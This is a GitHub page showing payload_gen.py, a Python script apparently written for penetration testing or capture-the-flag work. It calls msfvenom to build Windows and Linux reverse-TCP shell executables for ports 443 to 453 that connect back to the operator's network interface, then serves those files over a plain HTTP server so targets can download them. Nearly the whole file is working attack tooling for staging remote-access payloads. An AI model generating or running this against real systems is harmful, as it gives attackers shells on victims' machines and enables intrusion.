-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathpayload_gen.py
executable file
·96 lines (74 loc) · 2.91 KB
/
payload_gen.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
#!/usr/bin/python3
''' Script for automatically generating msf payloads
'''
import argparse
import http.server
import os
import socketserver
import subprocess
import sys
import net_utils
DIR = os.path.dirname(os.path.realpath(__file__))
PAYLOAD_DIR = os.path.join(DIR, "payloads")
PAYLOADS = {
"windows/x64/shell/reverse_tcp": "rshell64-%d.exe",
"windows/shell/reverse_tcp": "rshell32-%d.exe",
"linux/x64/shell/reverse_tcp": "rshell64-%d",
"linux/x86/shell/reverse_tcp": "rshell32-%d"
}
PORTS = range(443,454)
def check_msfvenom():
ret = subprocess.run(["which", "msfvenom"], stdout=subprocess.DEVNULL)
if ret.returncode is not 0:
sys.exit("[ERROR] Could not find msfvenom in you path")
def gen_reverse_shell(payload, out_file, lhost, lport):
desc = "%s -> %s -> tcp:%s:%d" % (out_file, payload, lhost, lport)
exe_format = "exe" if payload.startswith("windows") else "elf"
ret = subprocess.run([
"msfvenom", "-p", payload, "LHOST=%s" % lhost, "LPORT=%d" % lport,
"-o", out_file, "-f", exe_format], stdout=subprocess.DEVNULL,
stderr=subprocess.DEVNULL)
if ret.returncode is not 0:
print("Error generating: %s" % desc)
else:
print(desc)
def gen_payloads(lhost, iface_dir):
for payload in PAYLOADS.keys():
for port in PORTS:
filename = PAYLOADS[payload] % port
abs_path = os.path.join(iface_dir, filename)
if not os.path.exists(abs_path):
gen_reverse_shell(payload, abs_path, lhost, port)
def host_payloads(lhost, lport, hosting_dir):
Handler = http.server.SimpleHTTPRequestHandler
os.chdir(hosting_dir)
with socketserver.TCPServer((lhost, lport), Handler) as httpd:
print ("Serving payloads on http://%s:%d/..." % (lhost, lport))
httpd.serve_forever()
def main():
""" Main function for handling user arguments
"""
# validate that msfvenom is installed, this is a strict dependency
check_msfvenom()
# parse user arguments
parser = argparse.ArgumentParser(description='Gernerate and host msfvenom reverse payloads for ')
parser.add_argument('interface',
help='name of the interface that will host payloads and be called back to')
parser.add_argument('-l', dest='listen_port', default=-1, type=int, nargs="?",
help='port to host the payloads on; defaults to 80 if only flag is provided')
args = parser.parse_args()
# get interface ip
ip = net_utils.get_iface_ipv4(args.interface)
# verify payload dir exists
iface_dir = os.path.join(PAYLOAD_DIR, ip)
if not os.path.exists(iface_dir):
os.makedirs(iface_dir)
# generate payloads
gen_payloads(ip, iface_dir)
# get default listen port
listener = 80 if args.listen_port is None else args.listen_port
# host payloads
if listener > 0:
host_payloads(ip, listener, iface_dir)
if __name__ == "__main__":
main()